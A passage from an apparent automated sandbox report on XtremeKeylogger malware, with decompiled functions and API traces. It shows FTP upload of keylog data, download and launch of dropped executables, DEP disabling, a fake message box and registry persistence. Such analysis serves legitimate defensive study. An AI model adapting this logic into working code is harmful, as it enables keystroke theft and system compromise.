				goto L5;
			}

APIs

GetFileSize.KERNEL32(000000D0,00000000), ref: 00C87417

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00100164,0000C1F2,00000000,00000000), ref: 00C874D7
SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000000,00100164,0000C1F2,00000000,00000000,000000D0,00000000), ref: 00C874EC
VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,000000D0,00000000,00000000,00000000,00100164,0000C1F2,00000000,00000000,000000D0,00000000), ref: 00C87506
ReadFile.KERNEL32(000000D0,?,-00C8B0C8,?,00000000), ref: 00C87525
SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,000000D0,00000000,00000000), ref: 00C87536
SendMessageA.USER32(00100164,0000C1F3,00000000,00000000), ref: 00C8754B
SetFileAttributesW.KERNEL32(?,00000080,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
DeleteFileW.KERNEL32(?,?,00000080,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000), ref: 00C8755C
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592

Part of subcall function 00C85084: WriteFile.KERNEL32(000000D0,?,00000002,?,?), ref: 00C850AA

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
CloseHandle.KERNEL32(00000000), ref: 00C875C1

Part of subcall function 00C87918: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C87933
Part of subcall function 00C87918: InternetConnectW.WININET(00000000,?,00000015,?,?,00000001,08000000,00000000), ref: 00C8794F
Part of subcall function 00C87918: FtpSetCurrentDirectoryW.WININET(00000000,?), ref: 00C8795B
Part of subcall function 00C87918: WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 00C8796C
Part of subcall function 00C87918: FtpPutFileW.WININET(00000000,?,00000000,00000002,00000000), ref: 00C8797E
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C8798A
Part of subcall function 00C87918: InternetCloseHandle.WININET(00000000), ref: 00C87990

DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00100164), ref: 00C87602

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83280, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 120

C-Code - Quality: 96%

			E00C83280(WCHAR* __eax, intOrPtr* __edx) {
				short _t8;
				short _t9;
				WCHAR* _t10;
				short _t12;
				WCHAR* _t14;
				short _t16;
				WCHAR* _t17;
				short _t19;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				long _t37;
				signed int _t38;
				WCHAR* _t39;

				_t35 = __edx;
				_t24 = __eax;
				 *__edx = 0;
				while(1) {
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L2:
					_t8 =  *_t24;
					if(_t8 != 0 && _t8 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L4:
					if( *_t24 != 0x22 || _t24[1] != 0x22) {
						_t37 = 0;
						_t39 = _t24;
						while(1) {
							_t9 =  *_t24;
							if(_t9 <= 0x20) {
								break;
							}
							if(_t9 != 0x22) {
								_t10 = CharNextW(_t24);
								_t28 = _t10 - _t24;
								_t29 = _t28 >> 1;
								if(_t28 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t29;
								_t24 = _t10;
								continue;
							}
							_t24 = CharNextW(_t24);
							while(1) {
								_t12 =  *_t24;
								if(_t12 == 0 || _t12 == 0x22) {
									break;
								}
								_t14 = CharNextW(_t24);
								_t33 = _t14 - _t24;
								_t34 = _t33 >> 1;
								if(_t33 < 0) {
									asm("adc edx, 0x0");
								}
								_t37 = _t37 + _t34;
								_t24 = _t14;
							}
							if( *_t24 != 0) {
								_t24 = CharNextW(_t24);
							}
						}
						 *_t35 = VirtualAlloc(0, _t37, 0x1000, 4);
						_t25 = _t39;
						_t36 =  *_t35;
						_t38 = 0;
						while(1) {
							_t16 =  *_t25;
							if(_t16 <= 0x20) {
								break;
							}
							if(_t16 != 0x22) {
								_t17 = CharNextW(_t25);
								if(_t17 <= _t25) {
									continue;
								} else {
									goto L31;
								}
								do {
									L31:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t17 > _t25);
								continue;
							}
							_t25 = CharNextW(_t25);
							while(1) {
								_t19 =  *_t25;
								if(_t19 == 0 || _t19 == 0x22) {
									break;
								}
								_t21 = CharNextW(_t25);
								if(_t21 <= _t25) {
									continue;
								} else {
									goto L25;
								}
								do {
									L25:
									 *((short*)(_t36 + _t38 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t38 = _t38 + 1;
								} while (_t21 > _t25);
							}
							if( *_t25 != 0) {
								_t25 = CharNextW(_t25);
							}
						}
						return _t25;
					} else {
						_t24 =  &(_t24[2]);
						continue;
					}
				}
			}

APIs

CharNextW.USER32(00000000), ref: 00C8328F
CharNextW.USER32(00000000), ref: 00C832C3
CharNextW.USER32(00000000), ref: 00C832CD
CharNextW.USER32(00000000), ref: 00C832F6
CharNextW.USER32(00000000), ref: 00C83300
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,00000000,00000001,00C8347B,00000000,00C83498), ref: 00C83327
CharNextW.USER32(00000000), ref: 00C8333D
CharNextW.USER32(00000000), ref: 00C83347
CharNextW.USER32(00000000), ref: 00C83374
CharNextW.USER32(00000000), ref: 00C8337E

Strings

", xrefs: 00C832AA
", xrefs: 00C832A4

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C879DA, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 35
registryclipboard

C-Code - Quality: 60%

			E00C879DA() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgkmjgtmklgtlrglt, xrefs: 00C87A41
hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C879DC, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34
registryclipboard

C-Code - Quality: 60%

			E00C879DC() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0xc87a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0xc8dee4 =  *0xc8dee4 - 1;
				if( *0xc8dee4 < 0) {
					 *0xc8decc = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0xc8ded0 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0xc8ded4 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0xc8ded8 = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0xc8dedc = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
					 *0xc8dee0 = RegisterClipboardFormatW(L"frgkmjgtmklgtlrglt");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E00C87A65);
				return 0;
			}

0x00c879e1
0x00c879e2
0x00c879e7
0x00c879ea
0x00c879ed
0x00c879f4
0x00c87a00
0x00c87a0f
0x00c87a1e
0x00c87a2d
0x00c87a3c
0x00c87a4b
0x00c87a4b
0x00c87a52
0x00c87a55
0x00c87a58
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 00C879FB
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 00C87A0A
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 00C87A19
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 00C87A28
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 00C87A37
RegisterClipboardFormatW.USER32(frgkmjgtmklgtlrglt), ref: 00C87A46

Strings

jiejwogfdjieovevodnvfnievn, xrefs: 00C879F6
jytjyegrsfvfbgfsdf, xrefs: 00C87A14
frgkmjgtmklgtlrglt, xrefs: 00C87A41
hgtrfsgfrsgfgregtregtr, xrefs: 00C87A23
trhgtehgfsgrfgtrwegtre, xrefs: 00C87A05
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 00C87A32

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C898DC, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 79
librarywindow

C-Code - Quality: 100%

			E00C898DC(intOrPtr _a4) {
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				signed int _t20;
				signed int _t21;

				_t17 = _a4;
				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				E00C888D0(0x80000001, L"SOFTWARE\\FakeMessage", 2, 4, 0, L"OK");
				_t12 =  *((intOrPtr*)(_t17 + 0x1554));
				if(_t12 != 0) {
					if(_t12 != 1) {
						if(_t12 != 2) {
							if(_t12 != 3) {
								if(_t12 != 4) {
									if(_t12 == 5) {
										_t21 = 2;
									}
								} else {
									_t21 = 3;
								}
							} else {
								_t21 = 4;
							}
						} else {
							_t21 = 5;
						}
					} else {
						_t21 = 1;
					}
				} else {
					_t21 = 0;
				}
				_t13 =  *((intOrPtr*)(_t17 + 0x1550));
				if(_t13 != 0) {
					if(_t13 != 1) {
						if(_t13 != 2) {
							if(_t13 != 3) {
								if(_t13 == 4) {
									_t20 = 0;
								}
							} else {
								_t20 = 0x40;
							}
						} else {
							_t20 = 0x30;
						}
					} else {
						_t20 = 0x10;
					}
				} else {
					_t20 = 0x20;
				}
				return MessageBoxW(0, _t17 + 0x156e, _t17 + 0x1558, _t21 | _t20);
			}

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

MessageBoxW.USER32(00000000,?,?,00000000), ref: 00C899C3

Strings

shell32.dll, xrefs: 00C898F9
user32.dll, xrefs: 00C898E5
advapi32.dll, xrefs: 00C898EF
SOFTWARE\FakeMessage, xrefs: 00C8991D
shlwapi.dll, xrefs: 00C89903
FakeMessage, xrefs: 00C89918

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87B84, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119
file

C-Code - Quality: 87%

			E00C87B84(void* __eax, void* __ebx, void* __esi) {
				long _v8;
				char _v12;
				WCHAR* _t12;
				WCHAR* _t14;
				WCHAR* _t19;
				WCHAR* _t21;
				long _t25;
				long _t29;
				void* _t30;
				struct _OVERLAPPED* _t32;
				void* _t37;
				WCHAR* _t41;
				WCHAR* _t46;
				intOrPtr _t48;
				intOrPtr _t57;
				struct _OVERLAPPED* _t59;
				void* _t61;
				WCHAR* _t63;
				WCHAR* _t64;
				void* _t66;
				void* _t67;
				void* _t70;

				_v12 = 0;
				_t66 = __eax;
				_push(_t70);
				_push(0xc87d2a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffff8;
				 *0xc8e020 = 0;
				 *0xc8e024 = 0;
				 *0xc8e028 = 0;
				if( *0xc8e014 == 1) {
					_t46 =  *0xc8e01c; // 0x320000
					if(E00C835B0(_t46) == 0) {
						_t64 =  *0xc8e01c; // 0x320000
						_t48 =  *0xc8e018; // 0x0
						E00C837C0(_t48, _t64);
					}
				}
				_t12 =  *0xc8e01c; // 0x320000
				if(E00C835B0(_t12) == 0) {
					_t63 =  *0xc8e01c; // 0x320000
					E00C837C0(_t66, _t63);
				}
				_t14 =  *0xc8e01c; // 0x320000
				if(E00C835B0(_t14) == 1) {
					_t19 =  *0xc8e01c; // 0x320000
					SetFileAttributesW(_t19, 0x80);
					_t21 =  *0xc8e01c; // 0x320000
					_t67 = CreateFileW(_t21, 0x80000000, 1, 0, 3, 0, 0);
					if(_t67 != 0xffffffff) {
						 *0xc8e024 = GetFileSize(_t67, 0);
						 *0xc8e028 = 0;
						_t25 =  *0xc8e024; // 0x0
						 *0xc8e020 = VirtualAlloc(0, _t25, 0x1000, 0x40);
						SetFilePointer(_t67, 0, 0, 0);
						_t29 =  *0xc8e024; // 0x0
						_t30 =  *0xc8e020; // 0x0
						ReadFile(_t67, _t30, _t29,  &_v8, 0);
						_t32 =  *0xc8e024; // 0x0
						_t59 =  *0xc8e028; // 0x0
						E00C81F6C( &_v12, E00C8214C(_t32, _t59, 2, 0));
						_t37 = E00C81CF4(_v12);
						_t61 =  *0xc8e020; // 0x0
						E00C82914(_t37, _t61);
						if((0 | E00C81F1C(L"ENDSERVERBUFFER", _v12) > 0x00000000) == 0) {
							_t41 =  *0xc8e01c; // 0x320000
							DeleteFileW(_t41);
							 *0xc8e020 = 0;
							 *0xc8e024 = 0;
							 *0xc8e028 = 0;
						}
					}
					CloseHandle(_t67);
				}
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00C87D31);
				return E00C81B78( &_v12);
			}

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
CreateFileW.KERNEL32(00320000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
GetFileSize.KERNEL32(00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000,00000000,00320000,00000080,00000000), ref: 00C87C6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
DeleteFileW.KERNEL32(00320000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00320000,80000000,00000001), ref: 00C87CEE
CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

Part of subcall function 00C837C0: DeleteUrlCacheEntryW.WININET(local), ref: 00C837C7
Part of subcall function 00C837C0: DeleteFileW.KERNEL32(00320000,local,00000000,00C87C00,00000000,00C87D2A,?,00000000,00000000), ref: 00C837CD
Part of subcall function 00C837C0: URLDownloadToFileW.URLMON(00000000,local,00320000,00000000,00000000), ref: 00C837DA

Strings

ENDSERVERBUFFER, xrefs: 00C87CD5

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C82994, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91
library

C-Code - Quality: 64%

			E00C82994(intOrPtr __eax) {
				signed int _v20;
				signed int _t15;
				signed int _t16;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t25;
				void* _t28;
				signed int _t32;
				signed int _t35;
				signed int _t36;
				signed int _t39;
				intOrPtr* _t40;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t42;
				signed int _t43;
				intOrPtr* _t44;
				void* _t45;
				intOrPtr* _t46;
				void* _t49;

				_t46 = _t45 + 0xfffffff8;
				 *_t46 = __eax;
				_t36 = 0;
				_t41 = GetModuleHandleA("Kernel32.dll");
				if(_t41 == 0xffffffff) {
					L10:
					__eflags = _t36 - 1;
					if(_t36 == 1) {
						L23:
						return _t36;
					}
					_t42 = GetModuleHandleA("ntdll.dll");
					__eflags = _t42 - 0xffffffff;
					if(_t42 == 0xffffffff) {
						goto L23;
					}
					_t43 = GetProcAddress(_t42, "NtSetInformationProcess");
					_t39 = _t43;
					__eflags = _t43;
					if(_t43 == 0) {
						goto L23;
					}
					_t15 =  *_t46 - 1;
					__eflags = _t15;
					if(__eflags < 0) {
						_t16 =  *0xc8b0a0; // 0x2
						_v20 = _t16;
						L20:
						_t19 =  *_t39(GetCurrentProcess(), 0x22,  &_v20, 4);
						__eflags = _t19;
						if(_t19 != 0) {
							_t36 = 0;
							__eflags = 0;
						} else {
							_t36 = 1;
						}
						goto L23;
					}
					if(__eflags == 0) {
						_t20 =  *0xc8b0a8; // 0x8
						_v20 = _t20 |  *0xc8b09c;
						goto L20;
					}
					__eflags = _t15 == 1;
					if(_t15 == 1) {
						_t23 =  *0xc8b0a8; // 0x8
						_t25 = _t23 |  *0xc8b09c |  *0xc8b0a4;
						__eflags = _t25;
						_v20 = _t25;
						goto L20;
					}
					goto L23;
				}
				_t44 = GetProcAddress(_t41, "SetProcessDEPPolicy");
				_t40 = _t44;
				if(_t44 == 0) {
					goto L10;
				}
				_t28 =  *_t46 - 1;
				_t49 = _t28;
				if(_t49 < 0) {
					_v20 = 0;
					L9:
					_t36 =  *_t40(_v20);
					goto L10;
				}
				if(_t49 == 0) {
					_t32 =  *0xc8b094; // 0x1
					_v20 = _t32 |  *0xc8b098;
					goto L9;
				}
				if(_t28 == 1) {
					_t35 =  *0xc8b094; // 0x1
					_v20 = _t35;
					goto L9;
				}
				goto L23;
			}

APIs

GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00C829A5
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy,Kernel32.dll), ref: 00C829B7
GetModuleHandleA.KERNEL32(ntdll.dll,Kernel32.dll), ref: 00C82A0B
GetProcAddress.KERNEL32(00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A1D
GetCurrentProcess.KERNEL32(00000022,?,00000004,00000000,NtSetInformationProcess,ntdll.dll,Kernel32.dll), ref: 00C82A73

Strings

Kernel32.dll, xrefs: 00C829A0
SetProcessDEPPolicy, xrefs: 00C829B1
NtSetInformationProcess, xrefs: 00C82A17
ntdll.dll, xrefs: 00C82A06

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C840F8, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 293

C-Code - Quality: 45%

			E00C840F8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v1308;
				void _v6188;
				char _v6740;
				char _v6744;
				char _v6748;
				char _v6752;
				char _v6756;
				char _v6760;
				char _v6764;
				char _v6768;
				char _v6772;
				char _v6776;
				char _v6780;
				char _v6784;
				char _v6788;
				char _v6792;
				char _v6796;
				char _v6800;
				char _v6804;
				char _v6808;
				char _t110;
				void* _t122;
				char _t130;
				void* _t203;
				char* _t206;
				void* _t207;
				void* _t223;
				void* _t225;
				void* _t227;
				void* _t229;
				intOrPtr _t237;
				char _t250;
				void* _t251;
				void* _t258;
				void* _t274;
				void* _t278;
				short* _t282;
				short* _t284;
				void* _t286;
				void* _t287;

				_t286 = _t287;
				_t207 = 0x352;
				goto L1;
				L4:
				E00C81DBC(_v8, 0);
				if(0 == 0) {
					L29:
					_pop(_t237);
					 *[fs:eax] = _t237;
					_push(E00C84541);
					E00C81B90( &_v6808, 0x11);
					return E00C81B90( &_v16, 3);
				} else {
					while(1) {
						E00C81DBC(_v8, 0);
						if(0 == 0) {
							goto L29;
						}
						E00C81B78( &_v16);
						E00C81B78( &_v12);
						E00C8291C();
						E00C82914(_t206, E00C81CF4(_v8));
						E00C81E8C( &_v8, 0x228, 1, __eflags);
						E00C81E40(_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags,  &_v16);
						E00C81E8C( &_v8, E00C8214C( *((intOrPtr*)(_t206 + 0x210)),  *((intOrPtr*)(_t206 + 0x214)), 2, 0), 1, __eflags);
						__eflags =  *((char*)(_t206 + 0x220));
						if(__eflags != 0) {
							L9:
							_t110 =  *((intOrPtr*)(_t206 + 0x218));
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 1;
								if(_t110 != 1) {
									__eflags = _t110 - 2;
									if(_t110 != 2) {
										__eflags = _t110 - 3;
										if(_t110 != 3) {
											__eflags = _t110 - 4;
											if(__eflags == 0) {
												__eflags = E00C83100();
												if(__eflags != 0) {
													E00C81C90( &_v6788, E00C833A8(E00C83100(), 0xc84580, __eflags));
													_push(_v6788);
													E00C81CD8( &_v6792, 0x105, _t206);
													_pop(_t258);
													E00C81D10( &_v12, _v6792, _t258, __eflags);
												}
											}
										} else {
											E00C81CD8( &_v6780, 0x105, _t206);
											_push(_v6780);
											E00C81C90( &_v6784, E00C82FE0());
											_pop(_t223);
											E00C81D10( &_v12, _t223, _v6784, __eflags);
										}
									} else {
										E00C81CD8( &_v6772, 0x105, _t206);
										_push(_v6772);
										E00C81C90( &_v6776, E00C83060(_t206));
										_pop(_t225);
										E00C81D10( &_v12, _t225, _v6776, __eflags);
									}
								} else {
									E00C81CD8( &_v6764, 0x105, _t206);
									_push(_v6764);
									E00C83034();
									E00C81C90( &_v6768, _v6764);
									_pop(_t227);
									E00C81D10( &_v12, _t227, _v6768, __eflags);
								}
							} else {
								E00C81CD8( &_v6756, 0x105, _t206);
								_push(_v6756);
								E00C81C90( &_v6760, E00C83008());
								_pop(_t229);
								E00C81D10( &_v12, _t229, _v6760, __eflags);
							}
							E00C81D10( &_v6796, L".exe", _v12, __eflags);
							__eflags = E00C83218(E00C81CF4(_v6796), E00C84578, 4, 0);
							if(__eflags != 0) {
								_t250 = _v12;
								E00C81D10( &_v6808, L".xtr", _t250, __eflags);
								DeleteFileW(E00C81CF4(_v6808));
							} else {
								E00C81C90( &_v6800, E00C833A8(E00C82FE0(), 0xc84580, __eflags));
								_push(_v6800);
								E00C81CD8( &_v6804, 0x105, _t206);
								_pop(_t250);
								E00C81D10( &_v12, _v6804, _t250, __eflags);
							}
							_t122 = E00C81D04(_v16);
							asm("cdq");
							_push(_t250);
							_push(_t122 + _t122);
							_push(E00C81CF4(_v16));
							_t284 = E00C81CF4(_v12);
							_pop(_t251);
							E00C83218(_t284, _t251);
							_t130 =  *((intOrPtr*)(_t206 + 0x21c));
							__eflags = _t130 - 2;
							if(_t130 != 2) {
								__eflags = _t130 - 1;
								if(_t130 != 1) {
									__eflags = _t130;
									if(_t130 == 0) {
										ShellExecuteW(0, L"open", _t284, 0, 0, 1);
									}
								} else {
									ShellExecuteW(0, L"open", _t284, 0, 0, 0);
								}
							}
							continue;
						}
						_push(0);
						_push( &_v6744);
						E00C81C90( &_v6748, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags));
						_push(_v6748);
						E00C81CD8( &_v6752, 0x105, _t206);
						_pop(_t274);
						E00C82E70(0x80000001, _t206, _v6752, _t274, _t284);
						E00C81DBC(_v6744, 0xc84570);
						if(__eflags == 0) {
							continue;
						} else {
							E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags), __eflags, 2, E00C84578);
							goto L9;
						}
					}
					goto L29;
				}
				L1:
				_push(0);
				_push(0);
				_t207 = _t207 - 1;
				if(_t207 != 0) {
					goto L1;
				} else {
					_push(_t207);
					_t284 = __eax;
					memcpy( &_v6188, __eax, 0x607 << 2);
					_t282 =  &(_t284[0x607]);
					_t206 =  &_v6740;
					_push(_t286);
					_push(0xc8453a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t287 + 0xc;
					E00C8406C( &_v8);
					E00C81DBC(_v8, 0);
					if(0 != 0) {
						_push(E00C81D04(_v8) + _t200);
						_t203 = E00C81CF4(_v8);
						_pop(_t278);
						E00C82B90(_t203, _t206, L"BINDER", _t278, _t282, _t284, E00C81D04(_v8) + _t200);
					}
					goto L4;
				}
			}

0x00c840f9
0x00c840fb
0x00c840fb
0x00c84160
0x00c84165
0x00c8416a
0x00c8450f
0x00c84511
0x00c84514
0x00c84517
0x00c84527
0x00c84539
0x00c84170
0x00c844ff
0x00c84504
0x00c84509
0x00000000
0x00000000
0x00c84178
0x00c84180
0x00c8418c
0x00c841a2
0x00c841b4
0x00c841dc
0x00c84200
0x00c84205
0x00c8420c
0x00c8429d
0x00c8429d
0x00c842a3
0x00c842a5
0x00c842e6
0x00c842e9
0x00c8432a
0x00c8432d
0x00c8436e
0x00c84371
0x00c843af
0x00c843b2
0x00c843b9
